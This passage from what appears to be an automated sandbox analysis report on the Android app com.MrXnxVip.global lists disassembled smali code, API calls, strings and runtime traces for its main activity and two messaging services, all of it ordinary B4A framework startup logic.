                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 819969
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.newmessage1 (has extras) }
                          • p0: b4a_wakelock
                          • p1: 20
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.newmessage1 (has extras) }
                        85cond_67: sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        87const-string v1, "b4a_foreground"
                        88const/16 v2, 0x1a
                        89if-lt v0, v2, :cond_79
                        90if-eqz p2, :cond_72
                        91goto/16 :goto_79
                        92cond_72:
                        93invoke-virtual {p1, v1, p3}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Z)Landroid/content/Intent;
                        95invoke-virtual {p0, p1}, Landroid/content/Context;->startForegroundService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        96goto/16 :goto_88
                        97goto_79:
                        98invoke-virtual {p0, p1}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        • Time: 696132
                          • This:
                            • android.app.ReceiverRestrictedContext@2893b75
                          • p0: Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • Return:
                            • ComponentInfo{com.MrXnxVip.global/com.MrXnxVip.global.firebasemessaging}
                        99try_end_7c: goto/16 :goto_88
                        100catch_7d: move-exception p2
                        101sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        102if-lt v0, v2, :cond_89
                        104invoke-virtual {p1, v1, p3}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Z)Landroid/content/Intent;
                        106invoke-virtual {p0, p1}, Landroid/content/Context;->startForegroundService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        107goto_88: return-void
                        108cond_89: new-instance p0, Ljava/lang/RuntimeException;
                        110invoke-direct {p0, p2}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        111throw p0
                        Cross References
                        APIs
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main.layout:Lanywheresoftware/b4a/BALayout
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • java.lang.ref.WeakReference.<init>
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main._activity:Lanywheresoftware/b4a/objects/ActivityWrapper
                        • java.lang.Float.valueOf
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main._activity:Lanywheresoftware/b4a/objects/ActivityWrapper
                        • com.MrXnxVip.global.main.activityBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.initializeProcessGlobals
                        • com.MrXnxVip.global.main.initializeGlobals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Boolean.valueOf
                        • com.MrXnxVip.global.main.mostCurrent:Lcom/MrXnxVip/global/main
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.main.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • java.lang.Exception.printStackTrace
                        Strings
                        • com.MrXnxVip.global
                        • com.MrXnxVip.global.main
                        • activity
                        • SHELL
                        • CREATE
                        • ** Activity (main) Create
                        • (first time)
                        • **
                        • ** Activity (main) Create (first time) **
                        • activity_create
                        • ** Activity (main) Resume **
                        • activity_resume
                        • invalidateOptionsMenu
                        Position Instruction Meta Information
                        0move-object/from16 v7, p0
                        2sget-object v0, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        3if-eq v7, v0, :cond_7
                        4return-void
                        5cond_7: new-instance v0, Lanywheresoftware/b4a/BA;
                        7iget-object v3, v7, Lcom/MrXnxVip/global/main;->layout:Lanywheresoftware/b4a/BALayout;
                        9sget-object v4, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        11const-string v5, "com.MrXnxVip.global"
                        13const-string v6, "com.MrXnxVip.global.main"
                        14move-object v1, v0
                        15move-object/from16 v2, p0
                        17invoke-direct/range {v1 .. v6}, Lanywheresoftware/b4a/BA;-><init>(Landroid/content/Context;Lanywheresoftware/b4a/BALayout;Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/String;)V
                        18iput-object v0, v7, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        20sget-object v0, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        22iget-object v0, v0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        23new-instance v1, Ljava/lang/ref/WeakReference;
                        25iget-object v2, v7, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        27invoke-direct {v1, v2}, Ljava/lang/ref/WeakReference;-><init>(Ljava/lang/Object;)V
                        28iput-object v1, v0, Lanywheresoftware/b4a/BA$SharedProcessBA;->activityBA:Ljava/lang/ref/WeakReference;
                        29const/4 v0, 0x0
                        30sput v0, Lanywheresoftware/b4a/objects/ViewWrapper;->lastId:I
                        31new-instance v1, Lanywheresoftware/b4a/objects/ActivityWrapper;
                        33iget-object v2, v7, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        35const-string v3, "activity"
                        37invoke-direct {v1, v2, v3}, Lanywheresoftware/b4a/objects/ActivityWrapper;-><init>(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        38iput-object v1, v7, Lcom/MrXnxVip/global/main;->_activity:Lanywheresoftware/b4a/objects/ActivityWrapper;
                        39sput-boolean v0, Lanywheresoftware/b4a/Msgbox;->isDismissing:Z
                        41sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        43invoke-static {v1}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        44move-result v1
                        45const/4 v2, 0x1
                        46if-eqz v1, :cond_85
                        47sget-boolean v1, Lcom/MrXnxVip/global/main;->isFirst:Z
                        48if-eqz v1, :cond_4f
                        50sget-object v8, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        51const/4 v9, 0x0
                        52const/4 v10, 0x1
                        53const/4 v12, 0x0
                        54new-array v13, v0, [Ljava/lang/Object;
                        56const-string v11, "SHELL"
                        58invoke-virtual/range {v8 .. v13}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        59cond_4f:
                        60sget-object v14, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        61const/4 v15, 0x0
                        62const/16 v16, 0x1
                        63const/16 v18, 0x1
                        64const/4 v1, 0x6
                        65new-array v1, v1, [Ljava/lang/Object;
                        67const-string v4, "com.MrXnxVip.global.main"
                        68aput-object v4, v1, v0
                        69aput-object v14, v1, v2
                        70const/4 v4, 0x2
                        72iget-object v5, v7, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        73aput-object v5, v1, v4
                        74const/4 v4, 0x3
                        76iget-object v5, v7, Lcom/MrXnxVip/global/main;->_activity:Lanywheresoftware/b4a/objects/ActivityWrapper;
                        77aput-object v5, v1, v4
                        78const/4 v4, 0x4
                        79sget v5, Lanywheresoftware/b4a/keywords/Common;->Density:F
                        81invoke-static {v5}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        82move-result-object v5
                        83aput-object v5, v1, v4
                        84const/4 v4, 0x5
                        86sget-object v5, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        87aput-object v5, v1, v4
                        89const-string v17, "CREATE"
                        90move-object/from16 v19, v1
                        92invoke-virtual/range {v14 .. v19}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        94iget-object v1, v7, Lcom/MrXnxVip/global/main;->_activity:Lanywheresoftware/b4a/objects/ActivityWrapper;
                        96iget-object v4, v7, Lcom/MrXnxVip/global/main;->activityBA:Lanywheresoftware/b4a/BA;
                        98invoke-virtual {v1, v4, v3}, Lanywheresoftware/b4a/objects/ActivityWrapper;->reinitializeForShell(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        99cond_85:
                        100invoke-static {}, Lcom/MrXnxVip/global/main;->initializeProcessGlobals()V
                        102invoke-static {}, Lcom/MrXnxVip/global/main;->initializeGlobals()V
                        103new-instance v1, Ljava/lang/StringBuilder;
                        105invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        107const-string v3, "** Activity (main) Create "
                        109invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        110sget-boolean v3, Lcom/MrXnxVip/global/main;->isFirst:Z
                        111if-eqz v3, :cond_9c
                        113const-string v3, "(first time)"
                        114goto/16 :goto_9e
                        115cond_9c:
                        116const-string v3, ""
                        117goto_9e:
                        118invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        120const-string v3, " **"
                        122invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        124invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        125move-result-object v1
                        127invoke-static {v1}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 690707
                          • p0: ** Activity (main) Create (first time) **
                        129sget-object v8, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        130const/4 v9, 0x0
                        131const/4 v10, 0x1
                        132const/4 v12, 0x0
                        133new-array v13, v2, [Ljava/lang/Object;
                        134sget-boolean v1, Lcom/MrXnxVip/global/main;->isFirst:Z
                        136invoke-static {v1}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        137move-result-object v1
                        138aput-object v1, v13, v0
                        140const-string v11, "activity_create"
                        142invoke-virtual/range {v8 .. v13}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        143sput-boolean v0, Lcom/MrXnxVip/global/main;->isFirst:Z
                        145sget-object v1, Lcom/MrXnxVip/global/main;->mostCurrent:Lcom/MrXnxVip/global/main;
                        146if-eq v7, v1, :cond_c8
                        147return-void
                        148cond_c8:
                        149sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        151invoke-virtual {v1, v0}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        153const-string v1, "** Activity (main) Resume **"
                        155invoke-static {v1}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 695433
                          • p0: ** Activity (main) Resume **
                        157sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        158new-array v2, v0, [Ljava/lang/Object;
                        159const/4 v3, 0x0
                        161const-string v4, "activity_resume"
                        163invoke-virtual {v1, v3, v4, v2}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        164sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
                        165const/16 v2, 0xb
                        166if-lt v1, v2, :cond_f6
                        167try_start_e2: const-class v1, Landroid/app/Activity;
                        169const-string v2, "invalidateOptionsMenu"
                        170new-array v0, v0, [Ljava/lang/Class;
                        172invoke-virtual {v1, v2, v0}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 695436
                          • This:
                            • class android.app.Activity
                            • getName:android.app.Activity
                          • p0: invalidateOptionsMenu
                          • p1: [Ljava.lang.Class;@990f6f7
                          • Return:
                            • public void android.app.Activity.invalidateOptionsMenu()
                            • getName: invalidateOptionsMenu
                        173move-result-object v0
                        174check-cast v3, [Ljava/lang/Object;
                        176invoke-virtual {v0, v7, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Reflective invoke: android.app.Activity.invalidateOptionsMenu
                          • This:
                            • com.MrXnxVip.global.main@ff69451
                          • Return:
                            • null
                        • Time: 695438
                          • This:
                            • public void android.app.Activity.invalidateOptionsMenu()
                            • getName:invalidateOptionsMenu
                          • p0: com.MrXnxVip.global.main@ff69451
                          • p1: null
                          • Return:
                            • null
                        177try_end_f1: goto/16 :goto_f6
                        178catch_f2: move-exception v0
                        180invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
                        181goto_f6: return-void
                        APIs
                        • android.app.Service.onCreate
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.StringBuilder.<init>
                        • android.app.Application.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Object.getClass
                        • java.lang.RuntimeException.<init>
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging._service:Lanywheresoftware/b4a/objects/ServiceHelper
                        • java.lang.Float.valueOf
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.firebasemessaging.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • com.MrXnxVip.global.firebasemessaging
                        • SHELL
                        • com.MrXnxVip.global
                        • .main
                        • com.MrXnxVip.global.main
                        • initializeProcessGlobals
                        • CREATE
                        • *** Service (firebasemessaging) Create ***
                        • service_create
                        • oncreate
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/app/Service;->onCreate()V
                        2sput-object p0, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        4sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        5const/4 v1, 0x0
                        6const/4 v2, 0x0
                        7if-nez v0, :cond_66
                        8new-instance v0, Lanywheresoftware/b4a/BA;
                        9const/4 v5, 0x0
                        10const/4 v6, 0x0
                        12const-string v7, "com.MrXnxVip.global"
                        14const-string v8, "com.MrXnxVip.global.firebasemessaging"
                        15move-object v3, v0
                        16move-object v4, p0
                        18invoke-direct/range {v3 .. v8}, Lanywheresoftware/b4a/BA;-><init>(Landroid/content/Context;Lanywheresoftware/b4a/BALayout;Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/String;)V
                        19sput-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        21invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        22move-result v0
                        23if-eqz v0, :cond_2c
                        25sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        26const/4 v4, 0x0
                        27const/4 v5, 0x1
                        28const/4 v7, 0x0
                        29new-array v8, v2, [Ljava/lang/Object;
                        31const-string v6, "SHELL"
                        33invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        34try_start_2c: new-instance v0, Ljava/lang/StringBuilder;
                        36invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        38sget-object v3, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        40invoke-virtual {v3}, Landroid/app/Application;->getPackageName()Ljava/lang/String;
                        • Time: 688168
                          • This:
                            • android.app.Application@feb8753
                          • Return:
                            • com.MrXnxVip.global
                        41move-result-object v3
                        43invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45const-string v3, ".main"
                        47invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        50move-result-object v0
                        52invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 688180
                          • p0: (Intent)
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        53move-result-object v0
                        55const-string v3, "initializeProcessGlobals"
                        56new-array v4, v2, [Ljava/lang/Class;
                        58invoke-virtual {v0, v3, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 688182
                          • This:
                            • class com.MrXnxVip.global.main
                            • getName:com.MrXnxVip.global.main
                          • p0: 1
                          • p1: [Ljava.lang.Class;@b810c72
                          • Return:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName: initializeProcessGlobals
                        59move-result-object v0
                        61invoke-virtual {v0, v1, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 688185
                          • This:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName:initializeProcessGlobals
                          • p0: null
                          • p1: null
                          • Return:
                            • null
                        • Reflective invoke: com.MrXnxVip.global.main.initializeProcessGlobals
                          • Return:
                            • null
                        62try_end_52:
                        63sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        65invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 688186
                          • This:
                            • com.MrXnxVip.global.firebasemessaging@16ac540
                          • Return:
                            • class com.MrXnxVip.global.firebasemessaging
                            • getName: com.MrXnxVip.global.firebasemessaging
                        66move-result-object v3
                        68invoke-virtual {v0, v3}, Lanywheresoftware/b4a/BA;->loadHtSubs(Ljava/lang/Class;)V
                        70invoke-static {}, Lanywheresoftware/b4a/objects/ServiceHelper;->init()V
                        71goto/16 :goto_66
                        72catch_5f: move-exception v0
                        73new-instance v1, Ljava/lang/RuntimeException;
                        75invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        76throw v1
                        77goto_66: new-instance v0, Lanywheresoftware/b4a/objects/ServiceHelper;
                        79invoke-direct {v0, p0}, Lanywheresoftware/b4a/objects/ServiceHelper;-><init>(Landroid/app/Service;)V
                        80iput-object v0, p0, Lcom/MrXnxVip/global/firebasemessaging;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        82sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        83iput-object p0, v0, Lanywheresoftware/b4a/BA;->service:Landroid/app/Service;
                        85sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        87invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        88move-result v0
                        89if-eqz v0, :cond_9b
                        91sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        92const/4 v4, 0x0
                        93const/4 v5, 0x1
                        94const/4 v7, 0x1
                        95const/4 v0, 0x4
                        96new-array v8, v0, [Ljava/lang/Object;
                        98const-string v0, "com.MrXnxVip.global.firebasemessaging"
                        99aput-object v0, v8, v2
                        100const/4 v0, 0x1
                        101aput-object v3, v8, v0
                        102const/4 v0, 0x2
                        104iget-object v6, p0, Lcom/MrXnxVip/global/firebasemessaging;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        105aput-object v6, v8, v0
                        106const/4 v0, 0x3
                        107sget v6, Lanywheresoftware/b4a/keywords/Common;->Density:F
                        109invoke-static {v6}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        110move-result-object v6
                        111aput-object v6, v8, v0
                        113const-string v6, "CREATE"
                        115invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        116cond_9b:
                        117sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        119invoke-static {v0, v2}, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->startFromServiceCreate(Lanywheresoftware/b4a/BA;Z)Z
                        120move-result v0
                        121if-nez v0, :cond_a4
                        122goto/16 :goto_b7
                        123cond_a4:
                        124sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        126invoke-virtual {v0, v2}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        128const-string v0, "*** Service (firebasemessaging) Create ***"
                        130invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 688207
                          • p0: 17303601
                        132sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        133new-array v2, v2, [Ljava/lang/Object;
                        135const-string v3, "service_create"
                        137invoke-virtual {v0, v1, v3, v2}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        138goto_b7:
                        139sget-object v0, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        141const-string v2, "oncreate"
                        143invoke-virtual {v0, v2, p0, v1}, Lanywheresoftware/b4a/BA;->runHook(Ljava/lang/String;Ljava/lang/Object;[Ljava/lang/Object;)Z
                        144return-void
                        APIs
                        • android.app.Service.onCreate
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.StringBuilder.<init>
                        • android.app.Application.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Object.getClass
                        • java.lang.RuntimeException.<init>
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1._service:Lanywheresoftware/b4a/objects/ServiceHelper
                        • java.lang.Float.valueOf
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.newmessage1.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • com.MrXnxVip.global
                        • com.MrXnxVip.global.newmessage1
                        • SHELL
                        • .main
                        • com.MrXnxVip.global.main
                        • initializeProcessGlobals
                        • CREATE
                        • *** Service (newmessage1) Create ***
                        • service_create
                        • oncreate
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/app/Service;->onCreate()V
                        2sput-object p0, Lcom/MrXnxVip/global/newmessage1;->mostCurrent:Lcom/MrXnxVip/global/newmessage1;
                        4sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        5const/4 v1, 0x0
                        6const/4 v2, 0x0
                        7if-nez v0, :cond_66
                        8new-instance v0, Lanywheresoftware/b4a/BA;
                        9const/4 v5, 0x0
                        10const/4 v6, 0x0
                        12const-string v7, "com.MrXnxVip.global"
                        14const-string v8, "com.MrXnxVip.global.newmessage1"
                        15move-object v3, v0
                        16move-object v4, p0
                        18invoke-direct/range {v3 .. v8}, Lanywheresoftware/b4a/BA;-><init>(Landroid/content/Context;Lanywheresoftware/b4a/BALayout;Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/String;)V
                        19sput-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        21invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        22move-result v0
                        23if-eqz v0, :cond_2c
                        25sget-object v3, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        26const/4 v4, 0x0
                        27const/4 v5, 0x1
                        28const/4 v7, 0x0
                        29new-array v8, v2, [Ljava/lang/Object;
                        31const-string v6, "SHELL"
                        33invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        34try_start_2c: new-instance v0, Ljava/lang/StringBuilder;
                        36invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        38sget-object v3, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        40invoke-virtual {v3}, Landroid/app/Application;->getPackageName()Ljava/lang/String;
                        41move-result-object v3
                        43invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45const-string v3, ".main"
                        47invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        50move-result-object v0
                        52invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 695991
                          • p0: com.MrXnxVip.global.main
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        53move-result-object v0
                        55const-string v3, "initializeProcessGlobals"
                        56new-array v4, v2, [Ljava/lang/Class;
                        58invoke-virtual {v0, v3, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 696013
                          • This:
                            • class com.MrXnxVip.global.main
                            • getName:com.MrXnxVip.global.main
                          • p0: 1
                          • p1: [Ljava.lang.Class;@9d051b5
                          • Return:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName: initializeProcessGlobals
                        59move-result-object v0
                        61invoke-virtual {v0, v1, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 696014
                          • This:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName:initializeProcessGlobals
                          • p0: null
                          • p1: null
                          • Return:
                            • null
                        • Reflective invoke: com.MrXnxVip.global.main.initializeProcessGlobals
                          • Return:
                            • null
                        62try_end_52:
                        63sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        65invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 696016
                          • This:
                            • com.MrXnxVip.global.newmessage1@9fe7bbb
                          • Return:
                            • class com.MrXnxVip.global.newmessage1
                            • getName: com.MrXnxVip.global.newmessage1
                        66move-result-object v3
                        68invoke-virtual {v0, v3}, Lanywheresoftware/b4a/BA;->loadHtSubs(Ljava/lang/Class;)V
                        70invoke-static {}, Lanywheresoftware/b4a/objects/ServiceHelper;->init()V
                        71goto/16 :goto_66
                        72catch_5f: move-exception v0
                        73new-instance v1, Ljava/lang/RuntimeException;
                        75invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        76throw v1
                        77goto_66: new-instance v0, Lanywheresoftware/b4a/objects/ServiceHelper;
                        79invoke-direct {v0, p0}, Lanywheresoftware/b4a/objects/ServiceHelper;-><init>(Landroid/app/Service;)V
                        80iput-object v0, p0, Lcom/MrXnxVip/global/newmessage1;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
